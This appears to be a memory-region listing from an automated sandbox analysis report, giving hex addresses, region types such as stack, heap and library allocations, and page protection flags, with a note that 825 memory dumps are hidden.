4761CFB000
stack
page read and write
16371BDE000
heap
page read and write
B72CEFF000
stack
page read and write
1766C902000
heap
page read and write
1C8F4320000
heap
page read and write
1766D002000
trusted library allocation
page read and write
23E7A780000
heap
page read and write
B4CB2FD000
stack
page read and write
1766C813000
heap
page read and write
2784F960000
heap
page read and write
7FF5ADD64000
unkown
page readonly
1D9DD42E000
heap
page read and write
16371D90000
heap
page read and write
21845D02000
heap
page read and write
21845C49000
heap
page read and write
2474E2A0000
heap
page read and write
1D9DD435000
heap
page read and write
28F9802C000
unkown
page read and write
4761E7F000
stack
page read and write
1D9DD3D7000
heap
page read and write
36E737F000
stack
page read and write
1D9DD406000
heap
page read and write
1D9DDC56000
heap
page read and write
1D9DD3EA000
heap
page read and write
2784F9CB000
heap
page read and write
2222EAC000
stack
page read and write
B72D177000
stack
page read and write
1F02B7F0000
heap
page read and write
1AF64142000
heap
page read and write
1C8F4A8A000
heap
page read and write
116DC170000
trusted library allocation
page read and write
116DC300000
heap
page read and write
2474F7A0000
trusted library allocation
page read and write
11A2D7B000
stack
page read and write
25258B40000
heap
page read and write
21845C45000
heap
page read and write
1D9DD3CE000
heap
page read and write
1D9DD447000
heap
page read and write
2474C042000
heap
page read and write
1D9DDF49000
heap
page read and write
1D9DD421000
heap
page read and write
1F626A40000
heap
page read and write
1D9DD3A0000
heap
page read and write
1766C6F0000
heap
page read and write
222347E000
stack
page read and write
1AF64242000
heap
page read and write
1759FD70000
trusted library allocation
page read and write
28F9802B000
unkown
page read and write
1C8F43B1000
heap
page read and write
2474E0A0000
heap
page read and write
116DC200000
heap
page read and write
2222F2F000
stack
page read and write
21845C8B000
heap
page read and write
25258B90000
heap
page read and write
1D9DD443000
heap
page read and write
B4CB67E000
stack
page read and write
1D9DD610000
heap
page read and write
F5C5ACB000
stack
page read and write
1D9DD410000
heap
page read and write
1AF642B4000
heap
page read and write
28F9800E000
unkown
page read and write
1D9DDF4E000
heap
page read and write
116DC280000
heap
page read and write
28F97F41000
unkown
page readonly
1D9DD3F1000
heap
page read and write
1D9DD358000
heap
page read and write
1D9DD3B0000
heap
page read and write
116DCA02000
trusted library allocation
page read and write
1D9DD440000
heap
page read and write
1F02B9A0000
remote allocation
page read and write
1AF64247000
heap
page read and write
1D9DD3DE000
heap
page read and write
1AF64090000
heap
page read and write
1D9DD406000
heap
page read and write
6260EC000
stack
page read and write
2474C065000
heap
page read and write
28F98802000
unkown
page read and write
1AF64088000
heap
page read and write
23927284000
heap
page read and write
116DC302000
heap
page read and write
21845C97000
heap
page read and write
1D9DD3F6000
heap
page read and write
1F377320000
heap
page read and write
2474C042000
heap
page read and write
21845C83000
heap
page read and write
21845C9B000
heap
page read and write
1C8F4A21000
heap
page read and write
1C8F434C000
heap
page read and write
28F98000000
unkown
page read and write
222337F000
stack
page read and write
1C8F4A64000
heap
page read and write
DCD088C000
stack
page read and write
2474BFD1000
heap
page read and write
116DC313000
heap
page read and write
1D9DD37F000
heap
page read and write
1D9DD3F4000
heap
page read and write
7FF5ADC93000
unkown
page readonly
7FF5ADCA8000
unkown
page readonly
1C8F4A56000
heap
page read and write
2474BFCA000
heap
page read and write
25258B98000
heap
page read and write
2474DF30000
trusted library allocation
page read and write
B4CB4FC000
stack
page read and write
36E727B000
stack
page read and write
247500A0000
trusted library allocation
page read and write
1D9DDF37000
heap
page read and write
2474BEF0000
heap
page read and write
1D9DDF35000
heap
page read and write
3005AFD000
stack
page read and write
1AF64130000
heap
page read and write
11A2F7D000
stack
page read and write
1D9DD3DE000
heap
page read and write
2474C003000
heap
page read and write
1D9DDF54000
heap
page read and write
1AF64142000
heap
page read and write
1D9DDC5B000
heap
page read and write
1D9DD3CE000
heap
page read and write
1D9DDC53000
heap
page read and write
2474BFC2000
heap
page read and write
1759FE6F000
heap
page read and write
21845C42000
heap
page read and write
1C8F4180000
heap
page read and write
28F98022000
unkown
page read and write
1D9DD350000
heap
page read and write
3005CFC000
stack
page read and write
1AF64240000
heap
page read and write
1C8F49E9000
heap
page read and write
1D9DD3DD000
heap
page read and write
7FF5ADCE8000
unkown
page readonly
1F02BA6E000
heap
page read and write
1C8F4338000
heap
page read and write
1AF63E30000
heap
page read and write
2474BFC5000
heap
page read and write
8EB1F9B000
stack
page read and write
1D9DD416000
heap
page read and write
1AF64091000
heap
page read and write
2474E060000
heap
page read and write
1D9DD447000
heap
page read and write
1E0A1A6B000
heap
page read and write
21845C6F000
heap
page read and write
1D9DD417000
heap
page read and write
1759FF02000
heap
page read and write
2474C02C000
heap
page read and write
2474DF20000
heap
page read and write
1D9DDC5F000
heap
page read and write
1759FE4E000
heap
page read and write
1E0A1A4B000
heap
page read and write
23927070000
heap
page read and write
1766C88A000
heap
page read and write
2474C210000
trusted library allocation
page read and write
B72CDFB000
stack
page read and write
1D9DD3A2000
heap
page read and write
28F98045000
unkown
page read and write
2474C25E000
heap
page read and write
F5C5BCB000
stack
page read and write
21845B80000
trusted library allocation
page read and write
7FF5ADD14000
unkown
page readonly
1D9DD40A000
heap
page read and write
1AF63F70000
heap
page read and write
247505A0000
trusted library allocation
page read and write
1D9DD3CE000
heap
page read and write
2474C00E000
heap
page read and write
There are 825 hidden memdumps, click here to show them.